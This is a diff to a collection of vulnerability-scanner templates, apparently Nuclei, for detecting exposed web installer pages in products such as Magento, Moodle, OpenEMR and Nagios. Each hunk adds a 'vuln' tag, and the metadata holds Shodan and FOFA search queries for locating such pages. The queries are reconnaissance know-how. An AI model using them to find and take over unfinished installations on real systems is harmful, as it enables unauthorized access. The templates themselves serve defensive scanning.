a/http/misconfiguration/installer/limesurvey-installer.yaml b/http/misconfiguration/installer/limesurvey-installer.yaml index 1eee9117980..217ed64522d 100644 --- a/http/misconfiguration/installer/limesurvey-installer.yaml +++ b/http/misconfiguration/installer/limesurvey-installer.yaml @@ -13,7 +13,7 @@ info: shodan-query: html:"Limesurvey Installer" product: limesurvey vendor: limesurvey - tags: misconfig,limesurvey,install + tags: misconfig,limesurvey,install,vuln http: - method: GET path: diff --git a/http/misconfiguration/installer/listmonk-installer.yaml b/http/misconfiguration/installer/listmonk-installer.yaml index f29f5934bb0..8131407822f 100644 --- a/http/misconfiguration/installer/listmonk-installer.yaml +++ b/http/misconfiguration/installer/listmonk-installer.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"Listmonk" - tags: misconfig,listmonk,install,exposure + tags: misconfig,listmonk,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/lmszai-installer.yaml b/http/misconfiguration/installer/lmszai-installer.yaml index dcfc0de395e..f21fbc0afb8 100644 --- a/http/misconfiguration/installer/lmszai-installer.yaml +++ b/http/misconfiguration/installer/lmszai-installer.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: html:"LMSZAI - Learning Management System" - tags: misconfig,blesta,install,exposure + tags: misconfig,blesta,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/lychee-installer.yaml b/http/misconfiguration/installer/lychee-installer.yaml index 39abc47ea3e..546c9181b14 100644 --- a/http/misconfiguration/installer/lychee-installer.yaml +++ b/http/misconfiguration/installer/lychee-installer.yaml @@ -13,7 +13,7 @@ info: vendor: lycheeorg product: lychee shodan-query: html:"Lychee-installer" - tags: misconfig,lychee,install,exposure + tags: misconfig,lychee,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/magento-installer.yaml b/http/misconfiguration/installer/magento-installer.yaml index 5fec57c1777..3dc72997937 100644 --- a/http/misconfiguration/installer/magento-installer.yaml +++ b/http/misconfiguration/installer/magento-installer.yaml @@ -13,7 +13,7 @@ info: vendor: magento product: magento shodan-query: html:"Magento Installation" - tags: misconfig,magento,install,exposure + tags: misconfig,magento,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/magnolia-installer.yaml b/http/misconfiguration/installer/magnolia-installer.yaml index fdf129f10a6..a3a2684c601 100644 --- a/http/misconfiguration/installer/magnolia-installer.yaml +++ b/http/misconfiguration/installer/magnolia-installer.yaml @@ -15,7 +15,7 @@ info: vendor: magnolia-cms product: magnolia_cms shodan-query: title:"Magnolia Installation" - tags: magnolia,exposure,installer,misconfig + tags: magnolia,exposure,installer,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/installer/mantisbt-installer.yaml b/http/misconfiguration/installer/mantisbt-installer.yaml index 6157841f0f0..32e677babd7 100644 --- a/http/misconfiguration/installer/mantisbt-installer.yaml +++ b/http/misconfiguration/installer/mantisbt-installer.yaml @@ -13,7 +13,7 @@ info: vendor: mantisbt product: mantisbt shodan-query: html:"Administration - Installation - MantisBT" - tags: misconfig,mantisbt,install,exposure + tags: misconfig,mantisbt,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/matomo-installer.yaml b/http/misconfiguration/installer/matomo-installer.yaml index a983cb115e9..3dc5d683257 100644 --- a/http/misconfiguration/installer/matomo-installer.yaml +++ b/http/misconfiguration/installer/matomo-installer.yaml @@ -13,7 +13,7 @@ info: vendor: matomo product: matomo shodan-query: title:"Matomo" - tags: misconfig,matomo,install + tags: misconfig,matomo,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/mautic-installer.yaml b/http/misconfiguration/installer/mautic-installer.yaml index 4232ff6ddd7..43f7ee80fd4 100644 --- a/http/misconfiguration/installer/mautic-installer.yaml +++ b/http/misconfiguration/installer/mautic-installer.yaml @@ -13,7 +13,7 @@ info: vendor: acquia product: mautic shodan-query: html:"Mautic Installation" - tags: misconfig,mautic,install + tags: misconfig,mautic,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/mcloud-installer.yaml b/http/misconfiguration/installer/mcloud-installer.yaml index 67763541091..99ee2e473b6 100644 --- a/http/misconfiguration/installer/mcloud-installer.yaml +++ b/http/misconfiguration/installer/mcloud-installer.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"mcloud-installer-web" - tags: panel,mcloud,exposure,misconfig + tags: panel,mcloud,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/installer/metaview-explorer-installer.yaml b/http/misconfiguration/installer/metaview-explorer-installer.yaml index e57fd333b42..eff6fc8d249 100644 --- a/http/misconfiguration/installer/metaview-explorer-installer.yaml +++ b/http/misconfiguration/installer/metaview-explorer-installer.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"MetaView Explorer" - tags: misconfig,metaview,installer + tags: misconfig,metaview,installer,vuln http: - method: GET diff --git a/http/misconfiguration/installer/microweber-install.yaml b/http/misconfiguration/installer/microweber-install.yaml index 8754c1ce7ff..d0510c3b6fb 100644 --- a/http/misconfiguration/installer/microweber-install.yaml +++ b/http/misconfiguration/installer/microweber-install.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: misconfig,microweber,install + tags: misconfig,microweber,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/monstra-installer.yaml b/http/misconfiguration/installer/monstra-installer.yaml index c509e7b3fbe..f5e78bf771a 100644 --- a/http/misconfiguration/installer/monstra-installer.yaml +++ b/http/misconfiguration/installer/monstra-installer.yaml @@ -13,7 +13,7 @@ info: vendor: monstra product: monstra_cms shodan-query: 'title:"Monstra :: Install"' - tags: misconfig,monstra,install + tags: misconfig,monstra,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/moodle-installer.yaml b/http/misconfiguration/installer/moodle-installer.yaml index a188e28f097..926522b84aa 100644 --- a/http/misconfiguration/installer/moodle-installer.yaml +++ b/http/misconfiguration/installer/moodle-installer.yaml @@ -13,7 +13,7 @@ info: vendor: moodle product: moodle shodan-query: title:"Installation Moodle" - tags: misconfig,moodle,install,exposure + tags: misconfig,moodle,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/moosocial-installer.yaml b/http/misconfiguration/installer/moosocial-installer.yaml index 97adba3125c..61e3f4fee44 100644 --- a/http/misconfiguration/installer/moosocial-installer.yaml +++ b/http/misconfiguration/installer/moosocial-installer.yaml @@ -12,7 +12,7 @@ info: vendor: moosocial product: moosocial shodan-query: html:"mooSocial Installation" - tags: exposure,moosocial,misconfig,install + tags: exposure,moosocial,misconfig,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/mosparo-install.yaml b/http/misconfiguration/installer/mosparo-install.yaml index 6a8e0760c6d..f6c15c4a23a 100644 --- a/http/misconfiguration/installer/mosparo-install.yaml +++ b/http/misconfiguration/installer/mosparo-install.yaml @@ -13,7 +13,7 @@ info: vendor: mosparo product: mosparo shodan-query: title:"Setup - mosparo" - tags: misconfig,mosparo,install + tags: misconfig,mosparo,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/mura-cms-setup-installer.yaml b/http/misconfiguration/installer/mura-cms-setup-installer.yaml index d09ebe92731..4b3283b6264 100644 --- a/http/misconfiguration/installer/mura-cms-setup-installer.yaml +++ b/http/misconfiguration/installer/mura-cms-setup-installer.yaml @@ -16,7 +16,7 @@ info: vendor: murasoftware product: mura_cms fofa-query: body="Mura CMS - Setup" - tags: misconfig,install,exposure,mura-cms + tags: misconfig,install,exposure,mura-cms,vuln http: - method: GET diff --git a/http/misconfiguration/installer/nagios-logserver-installer.yaml b/http/misconfiguration/installer/nagios-logserver-installer.yaml index 38c2c8f2aeb..ce9c7de752e 100644 --- a/http/misconfiguration/installer/nagios-logserver-installer.yaml +++ b/http/misconfiguration/installer/nagios-logserver-installer.yaml @@ -11,7 +11,7 @@ info: max-request: 1 fofa-query: title="Install · Nagios Log Server" shodan-query: title:"Install · Nagios Log Server" - tags: misconfig,install,nagios,nagios-logserver + tags: misconfig,install,nagios,nagios-logserver,vuln http: - method: GET diff --git a/http/misconfiguration/installer/nagiosxi-installer.yaml b/http/misconfiguration/installer/nagiosxi-installer.yaml index 58dfb310b9f..f6097266827 100644 --- a/http/misconfiguration/installer/nagiosxi-installer.yaml +++ b/http/misconfiguration/installer/nagiosxi-installer.yaml @@ -13,7 +13,7 @@ info: vendor: nagios product: nagios_xi shodan-query: title:"Nagios XI" - tags: misconfig,exposure,install,nagiosxi + tags: misconfig,exposure,install,nagiosxi,vuln http: - method: GET diff --git a/http/misconfiguration/installer/navidrome-admin-install.yaml b/http/misconfiguration/installer/navidrome-admin-install.yaml index cdea4b6f013..3bb35f5d682 100644 --- a/http/misconfiguration/installer/navidrome-admin-install.yaml +++ b/http/misconfiguration/installer/navidrome-admin-install.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: html:"content="Navidrome"" - tags: navidrome,installer,misconfig,intrusive + tags: navidrome,installer,misconfig,intrusive,vuln variables: username: "admin" diff --git a/http/misconfiguration/installer/netsparker-enterprise-installer.yaml b/http/misconfiguration/installer/netsparker-enterprise-installer.yaml index 033ba495422..fa0b7554d72 100644 --- a/http/misconfiguration/installer/netsparker-enterprise-installer.yaml +++ b/http/misconfiguration/installer/netsparker-enterprise-installer.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-1575154882 - tags: misconfig,exposure,install,netsparker + tags: misconfig,exposure,install,netsparker,vuln http: - method: GET diff --git a/http/misconfiguration/installer/nginx-auto-installer.yaml b/http/misconfiguration/installer/nginx-auto-installer.yaml index 8fb0f86f0f8..88347c7ef7a 100644 --- a/http/misconfiguration/installer/nginx-auto-installer.yaml +++ b/http/misconfiguration/installer/nginx-auto-installer.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"NginX Auto Installer" - tags: misconfig,nginx,install,exposure + tags: misconfig,nginx,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/nodebb-installer.yaml b/http/misconfiguration/installer/nodebb-installer.yaml index bc1297e5c04..52540332eb9 100644 --- a/http/misconfiguration/installer/nodebb-installer.yaml +++ b/http/misconfiguration/installer/nodebb-installer.yaml @@ -13,7 +13,7 @@ info: vendor: nodebb product: nodebb shodan-query: title:"NodeBB Web Installer" - tags: misconfig,nodebb,install,exposure + tags: misconfig,nodebb,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/nopcommerce-installer.yaml b/http/misconfiguration/installer/nopcommerce-installer.yaml index 2ae8ea9d83c..d01fbe63011 100644 --- a/http/misconfiguration/installer/nopcommerce-installer.yaml +++ b/http/misconfiguration/installer/nopcommerce-installer.yaml @@ -18,7 +18,7 @@ info: shodan-query: html:"nopCommerce Installation" product: nopcommerce vendor: nopcommerce - tags: misconfig,nopcommerce,install + tags: misconfig,nopcommerce,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/octoprint-installer.yaml b/http/misconfiguration/installer/octoprint-installer.yaml index 144c1455451..a5829b06112 100644 --- a/http/misconfiguration/installer/octoprint-installer.yaml +++ b/http/misconfiguration/installer/octoprint-installer.yaml @@ -14,7 +14,7 @@ info: vendor: octoprint product: octoprint fofa-query: body="Thank you for installing OctoPrint" - tags: install,octoprint,misconfig + tags: install,octoprint,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/installer/ojs-installer.yaml b/http/misconfiguration/installer/ojs-installer.yaml index 7b4042cc096..675fc9184e4 100644 --- a/http/misconfiguration/installer/ojs-installer.yaml +++ b/http/misconfiguration/installer/ojs-installer.yaml @@ -13,7 +13,7 @@ info: vendor: openjournalsystems product: open_journal_systems shodan-query: http.favicon.hash:2099342476 - tags: misconfig,ojs,install,exposure + tags: misconfig,ojs,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/onlyoffice-installer.yaml b/http/misconfiguration/installer/onlyoffice-installer.yaml index 91c44c7b3a5..f6aae7179a4 100644 --- a/http/misconfiguration/installer/onlyoffice-installer.yaml +++ b/http/misconfiguration/installer/onlyoffice-installer.yaml @@ -16,7 +16,7 @@ info: vendor: onlyoffice product: onlyoffice shodan-query: html:"Portal Setup" - tags: misconfig,install,exposure,onlyoffice + tags: misconfig,install,exposure,onlyoffice,vuln http: - method: GET diff --git a/http/misconfiguration/installer/open-web-analytics-installer.yaml b/http/misconfiguration/installer/open-web-analytics-installer.yaml index 08a429913ac..0d6325c1595 100644 --- a/http/misconfiguration/installer/open-web-analytics-installer.yaml +++ b/http/misconfiguration/installer/open-web-analytics-installer.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"OWA CONFIG SETTINGS" - tags: misconfig,open-web-analytics,install,exposure + tags: misconfig,open-web-analytics,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/openemr-setup-installer.yaml b/http/misconfiguration/installer/openemr-setup-installer.yaml index 40e9b35d6c7..c7178f2fda2 100644 --- a/http/misconfiguration/installer/openemr-setup-installer.yaml +++ b/http/misconfiguration/installer/openemr-setup-installer.yaml @@ -16,7 +16,7 @@ info: vendor: open-emr product: openemr shodan-query: title:"OpenEMR Setup Tool" - tags: misconfig,install,exposure,openemr + tags: misconfig,install,exposure,openemr,vuln http: - method: GET diff --git a/http/misconfiguration/installer/openfire-setup.yaml b/http/misconfiguration/installer/openfire-setup.yaml index 3adf7a4be02..92e35384209 100644 --- a/http/misconfiguration/installer/openfire-setup.yaml +++ b/http/misconfiguration/installer/openfire-setup.yaml @@ -14,7 +14,7 @@ info: vendor: igniterealtime product: openfire shodan-query: html:"Welcome to Openfire Setup" - tags: install,openfire,exposure,misconfig + tags: install,openfire,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/installer/openmage-install.yaml b/http/misconfiguration/installer/openmage-install.yaml index 0d4ca92855b..96b80a15616 100644 --- a/http/misconfiguration/installer/openmage-install.yaml +++ b/http/misconfiguration/installer/openmage-install.yaml @@ -13,7 +13,7 @@ info: vendor: openmage product: openmage shodan-query: title:"OpenMage Installation Wizard" - tags: misconfig,openmage,install,exposure + tags: misconfig,openmage,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/openshift-installer-panel.yaml b/http/misconfiguration/installer/openshift-installer-panel.yaml index 65eb8700e37..59b8a996e11 100644 --- a/http/misconfiguration/installer/openshift-installer-panel.yaml +++ b/http/misconfiguration/installer/openshift-installer-panel.yaml @@ -16,7 +16,7 @@ info: shodan-query: title:"OpenShift Assisted Installer" product: openshift_assisted_installer vendor: redhat - tags: panel,openshift,cluster,misconfig + tags: panel,openshift,cluster,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/installer/opensis-installer.yaml b/http/misconfiguration/installer/opensis-installer.yaml index 3036257c640..bad7ae0c646 100644 --- a/http/misconfiguration/installer/opensis-installer.yaml +++ b/http/misconfiguration/installer/opensis-installer.yaml @@ -13,7 +13,7 @@ info: vendor: os4ed product: opensis shodan-query: title:"openSIS" - tags: misconfig,opensis,install,exposure + tags: misconfig,opensis,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/orangehrm-installer.yaml b/http/misconfiguration/installer/orangehrm-installer.yaml index 84dedfc7e71..35e56191ec6 100644 --- a/http/misconfiguration/installer/orangehrm-installer.yaml +++ b/http/misconfiguration/installer/orangehrm-installer.yaml @@ -13,7 +13,7 @@ info: vendor: orangehrm product: orangehrm shodan-query: http.title:"OrangeHRM Web Installation Wizard" - tags: misconfig,exposure,install,orangehrm + tags: misconfig,exposure,install,orangehrm,vuln http: - method: GET diff --git a/http/misconfiguration/installer/orangescrum-install.yaml b/http/misconfiguration/installer/orangescrum-install.yaml index ee46fcc3b3b..ae14e5450c6 100644 --- a/http/misconfiguration/installer/orangescrum-install.yaml +++ b/http/misconfiguration/installer/orangescrum-install.yaml @@ -13,7 +13,7 @@ info: vendor: orangescrum product: orangescrum shodan-query: title:"Orangescrum Setup Wizard" - tags: misconfig,orangescrum,install + tags: misconfig,orangescrum,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/orchard-installer.yaml b/http/misconfiguration/installer/orchard-installer.yaml index 8cc70cd17dc..f67aeed721a 100644 --- a/http/misconfiguration/installer/orchard-installer.yaml +++ b/http/misconfiguration/installer/orchard-installer.yaml @@ -14,7 +14,7 @@ info: vendor: orchardproject product: orchard shodan-query: html:"Orchard Setup - Get Started" - tags: misconfig,exposure,install,orchard + tags: misconfig,exposure,install,orchard,vuln http: - method: GET diff --git a/http/misconfiguration/installer/owncloud-installer-exposure.yaml b/http/misconfiguration/installer/owncloud-installer-exposure.yaml index 9f57bb761ca..af93f6dd829 100644 --- a/http/misconfiguration/installer/owncloud-installer-exposure.yaml +++ b/http/misconfiguration/installer/owncloud-installer-exposure.yaml @@ -13,7 +13,7 @@ info: vendor: owncloud product: owncloud shodan-query: title:"owncloud" - tags: misconfig,owncloud,exposure,install + tags: misconfig,owncloud,exposure,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/oxid-eshop-installer.yaml b/http/misconfiguration/installer/oxid-eshop-installer.yaml index f375abd9a9d..6ee1c1077ce 100644 --- a/http/misconfiguration/installer/oxid-eshop-installer.yaml +++ b/http/misconfiguration/installer/oxid-eshop-installer.yaml @@ -13,7 +13,7 @@ info: vendor: oxid-esales product: eshop shodan-query: title:"OXID eShop installation" - tags: misconfig,oxid,eshop,install,exposure + tags: misconfig,oxid,eshop,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/pagekit-installer.yaml b/http/misconfiguration/installer/pagekit-installer.yaml index 94a04c37f3e..485b4ff9188 100644 --- a/http/misconfiguration/installer/pagekit-installer.yaml +++ b/http/misconfiguration/installer/pagekit-installer.yaml @@ -15,7 +15,7 @@ info: vendor: pagekit product: pagekit shodan-query: title:"Pagekit Installer" - tags: misconfig,pagekit,install,exposure + tags: misconfig,pagekit,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/pandora-fms-installer.yaml b/http/misconfiguration/installer/pandora-fms-installer.yaml index 5eb82e03c66..9cb6c783cb7 100644 --- a/http/misconfiguration/installer/pandora-fms-installer.yaml +++ b/http/misconfiguration/installer/pandora-fms-installer.yaml @@ -16,7 +16,7 @@ info: vendor: pandorafms product: pandora_fms fofa-query: body="Pandora FMS - Installation Wizard" - tags: misconfig,install,exposure,pandora-fms + tags: misconfig,install,exposure,pandora-fms,vuln http: - method: GET diff --git a/http/misconfiguration/installer/permissions-installer.yaml b/http/misconfiguration/installer/permissions-installer.yaml index 3e5479c1d6f..1fd4219a192 100644 --- a/http/misconfiguration/installer/permissions-installer.yaml +++ b/http/misconfiguration/installer/permissions-installer.yaml @@ -13,7 +13,7 @@ info: vendor: suse product: permissions shodan-query: title:" Permissions | Installer" - tags: misconfig,permissions,install,exposure + tags: misconfig,permissions,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/phpbb-installer.yaml b/http/misconfiguration/installer/phpbb-installer.yaml index 7f0f5c75379..05e6d8e010c 100644 --- a/http/misconfiguration/installer/phpbb-installer.yaml +++ b/http/misconfiguration/installer/phpbb-installer.yaml @@ -13,7 +13,7 @@ info: vendor: phpbb product: phpbb shodan-query: html:"Installation Panel" - tags: misconfig,phpbb,install,exposure + tags: misconfig,phpbb,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/phpgedview-installer.yaml b/http/misconfiguration/installer/phpgedview-installer.yaml index eda9fe956c4..014c1f4e63e 100644 --- a/http/misconfiguration/installer/phpgedview-installer.yaml +++ b/http/misconfiguration/installer/phpgedview-installer.yaml @@ -13,7 +13,7 @@ info: vendor: phpgedview product: phpgedview shodan-query: html:"/phpgedview.db" - tags: misconfig,phpgedview,install,exposure + tags: misconfig,phpgedview,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/phpipam-installer.yaml b/http/misconfiguration/installer/phpipam-installer.yaml index 0a1180e3291..908df713542 100644 --- a/http/misconfiguration/installer/phpipam-installer.yaml +++ b/http/misconfiguration/installer/phpipam-installer.yaml @@ -14,7 +14,7 @@ info: vendor: phpipam product: phpipam shodan-query: html:"phpipam installation wizard" - tags: misconfig,exposure,install,phpipam + tags: misconfig,exposure,install,phpipam,vuln http: - method: GET diff --git a/http/misconfiguration/installer/phpmyfaq-installer.yaml b/http/misconfiguration/installer/phpmyfaq-installer.yaml index bbb6d4fef88..7f4096a78fd 100644 --- a/http/misconfiguration/installer/phpmyfaq-installer.yaml +++ b/http/misconfiguration/installer/phpmyfaq-installer.yaml @@ -13,7 +13,7 @@ info: vendor: phpmyfaq product: phpmyfaq fofa-query: "phpMyFAQ-setup" - tags: misconfig,phpmyfaq,install + tags: misconfig,phpmyfaq,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/phpwind-installer.yaml b/http/misconfiguration/installer/phpwind-installer.yaml index e1c2a75246b..cda9583a22e 100644 --- a/http/misconfiguration/installer/phpwind-installer.yaml +++ b/http/misconfiguration/installer/phpwind-installer.yaml @@ -13,7 +13,7 @@ info: vendor: phpwind product: phpwind shodan-query: title:"Powered by phpwind" - tags: misconfig,phpwind,exposure,install + tags: misconfig,phpwind,exposure,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/piwigo-installer.yaml b/http/misconfiguration/installer/piwigo-installer.yaml index e504d275dff..a44a57cf8c1 100644 --- a/http/misconfiguration/installer/piwigo-installer.yaml +++ b/http/misconfiguration/installer/piwigo-installer.yaml @@ -14,7 +14,7 @@ info: vendor: piwigo product: piwigo shodan-query: html:"Piwigo" html:"- Installation" - tags: misconfig,exposure,install,piwigo + tags: misconfig,exposure,install,piwigo,vuln http: - method: GET diff --git a/http/misconfiguration/installer/piwik-installer.yaml b/http/misconfiguration/installer/piwik-installer.yaml index 7a9d82a494e..12a3748738d 100644 --- a/http/misconfiguration/installer/piwik-installer.yaml +++ b/http/misconfiguration/installer/piwik-installer.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"Piwik › Installation" - tags: misconfig,piwik,install + tags: misconfig,piwik,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/pmm-installer.yaml b/http/misconfiguration/installer/pmm-installer.yaml index a31520e385f..6366ef2e8cf 100644 --- a/http/misconfiguration/installer/pmm-installer.yaml +++ b/http/misconfiguration/installer/pmm-installer.yaml @@ -13,7 +13,7 @@ info: vendor: percona product: monitoring_and_management shodan-query: http.title:"PMM Installation Wizard" - tags: misconfig,exposure,install,pmm + tags: misconfig,exposure,install,pmm,vuln http: - method: GET diff --git a/http/misconfiguration/installer/poste-io-installer.yaml b/http/misconfiguration/installer/poste-io-installer.yaml index 0808543c928..657e6074916 100644 --- a/http/misconfiguration/installer/poste-io-installer.yaml +++ b/http/misconfiguration/installer/poste-io-installer.yaml @@ -14,7 +14,7 @@ info: vendor: analogic product: poste.io fofa-query: body="Initial server configuration" - tags: misconfig,exposure,poste-io,install + tags: misconfig,exposure,poste-io,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/posteio-installer.yaml b/http/misconfiguration/installer/posteio-installer.yaml index 5ca8b883b4f..9e619eecee1 100644 --- a/http/misconfiguration/installer/posteio-installer.yaml +++ b/http/misconfiguration/installer/posteio-installer.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"Initial server configuration" - tags: misconfig,exposure,install,poste + tags: misconfig,exposure,install,poste,vuln http: - method: GET diff --git a/http/misconfiguration/installer/prestashop-installer.yaml b/http/misconfiguration/installer/prestashop-installer.yaml index 2234970afd2..0a107326d97 100644 --- a/http/misconfiguration/installer/prestashop-installer.yaml +++ b/http/misconfiguration/installer/prestashop-installer.yaml @@ -13,7 +13,7 @@ info: vendor: prestashop product: prestashop shodan-query: title:"PrestaShop Installation Assistant" - tags: misconfig,prestashop,exposure,install + tags: misconfig,prestashop,exposure,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/pritunl-installer.yaml b/http/misconfiguration/installer/pritunl-installer.yaml index c14ac4234d4..29e10f82e86 100644 --- a/http/misconfiguration/installer/pritunl-installer.yaml +++ b/http/misconfiguration/installer/pritunl-installer.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 fofa-query: title="Pritunl Database Setup" - tags: pritunl,misconfig,installer + tags: pritunl,misconfig,installer,vuln http: - method: GET diff --git a/http/misconfiguration/installer/processwire-installer.yaml b/http/misconfiguration/installer/processwire-installer.yaml index f22f240a3f9..3e0e4f7691d 100644 --- a/http/misconfiguration/installer/processwire-installer.yaml +++ b/http/misconfiguration/installer/processwire-installer.yaml @@ -13,7 +13,7 @@ info: vendor: processwire product: processwire shodan-query: title:"ProcessWire 3.x Installer" - tags: misconfig,processwire,install,exposure + tags: misconfig,processwire,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/profittrailer-installer.yaml b/http/misconfiguration/installer/profittrailer-installer.yaml index 36d40e9fa55..bbff375e759 100644 --- a/http/misconfiguration/installer/profittrailer-installer.yaml +++ b/http/misconfiguration/installer/profittrailer-installer.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"ProfitTrailer Setup" - tags: misconfig,install,exposure,profittrailer + tags: misconfig,install,exposure,profittrailer,vuln http: - method: GET diff --git a/http/misconfiguration/installer/projectsend-installer.yaml b/http/misconfiguration/installer/projectsend-installer.yaml index bbe495f9116..90c3b6308bb 100644 --- a/http/misconfiguration/installer/projectsend-installer.yaml +++ b/http/misconfiguration/installer/projectsend-installer.yaml @@ -16,7 +16,7 @@ info: vendor: projectsend product: projectsend shodan-query: html:"ProjectSend setup" - tags: misconfig,install,exposure,projectsend + tags: misconfig,install,exposure,projectsend,vuln http: - method: GET diff --git a/http/misconfiguration/installer/qloapps-installer.yaml b/http/misconfiguration/installer/qloapps-installer.yaml index 456cda5c229..9ed705537de 100644 --- a/http/misconfiguration/installer/qloapps-installer.yaml +++ b/http/misconfiguration/installer/qloapps-installer.yaml @@ -14,7 +14,7 @@ info: vendor: webkul product: qloapps fofa-query: title="QloApps Installation" - tags: install,qloapps,misconfig,exposure + tags: install,qloapps,misconfig,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/quickcms-installer.yaml b/http/misconfiguration/installer/quickcms-installer.yaml index 6a5b9fa3940..405f090efbe 100644 --- a/http/misconfiguration/installer/quickcms-installer.yaml +++ b/http/misconfiguration/installer/quickcms-installer.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"QuickCMS Installation" - tags: misconfig,exposure,install,quickcms + tags: misconfig,exposure,install,quickcms,vuln http: - method: GET diff --git a/http/misconfiguration/installer/redash-installer.yaml b/http/misconfiguration/installer/redash-installer.yaml index 1fefada3ebf..81d5bfd558f 100644 --- a/http/misconfiguration/installer/redash-installer.yaml +++ b/http/misconfiguration/installer/redash-installer.yaml @@ -13,7 +13,7 @@ info: vendor: redash product: redash shodan-query: html:"Redash Initial Setup" - tags: misconfig,redash,install + tags: misconfig,redash,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/ruckus-smartzone-install.yaml b/http/misconfiguration/installer/ruckus-smartzone-install.yaml index bdef301603e..1180d0e14de 100644 --- a/http/misconfiguration/installer/ruckus-smartzone-install.yaml +++ b/http/misconfiguration/installer/ruckus-smartzone-install.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: html:"Welcome to the Ruckus" - tags: misconfig,ruckus,smartzone,install + tags: misconfig,ruckus,smartzone,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/ruckus-unleashed-install.yaml b/http/misconfiguration/installer/ruckus-unleashed-install.yaml index 45eb2c63089..1d8b860c1ce 100644 --- a/http/misconfiguration/installer/ruckus-unleashed-install.yaml +++ b/http/misconfiguration/installer/ruckus-unleashed-install.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"Setup Wizard" html:"/ruckus" - tags: misconfig,ruckus,unleashed,install + tags: misconfig,ruckus,unleashed,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/sabnzbd-installer.yaml b/http/misconfiguration/installer/sabnzbd-installer.yaml index ec366544e89..6e1646269cf 100644 --- a/http/misconfiguration/installer/sabnzbd-installer.yaml +++ b/http/misconfiguration/installer/sabnzbd-installer.yaml @@ -17,7 +17,7 @@ info: product: sabnzbd shodan-query: html:"SABnzbd Quick-Start Wizard" fofa-query: body="SABnzbd Quick-Start Wizard" - tags: sabnzbd,wizard,installer,misconfig + tags: sabnzbd,wizard,installer,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/installer/saltbo-zpan-installer.yaml b/http/misconfiguration/installer/saltbo-zpan-installer.yaml index 73d4e13da7c..9d2cc09a3e4 100644 --- a/http/misconfiguration/installer/saltbo-zpan-installer.yaml +++ b/http/misconfiguration/installer/saltbo-zpan-installer.yaml @@ -14,7 +14,7 @@ info: product: zpan vendor: saltbo fofa-query: body="zpan" - tags: saltbo,zpan,installer,exposure,misconfig + tags: saltbo,zpan,installer,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/installer/server-monitor-installer.yaml b/http/misconfiguration/installer/server-monitor-installer.yaml index afd9e5b8c3a..838e1d48ff7 100644 --- a/http/misconfiguration/installer/server-monitor-installer.yaml +++ b/http/misconfiguration/installer/server-monitor-installer.yaml @@ -13,7 +13,7 @@ info: vendor: poweradmin product: pa_server_monitor shodan-query: title:"SERVER MONITOR - Install" - tags: misconfig,monitor,exposure,install + tags: misconfig,monitor,exposure,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/setup-github-enterprise.yaml b/http/misconfiguration/installer/setup-github-enterprise.yaml index bc3c2ebfb98..54e81a8856f 100644 --- a/http/misconfiguration/installer/setup-github-enterprise.yaml +++ 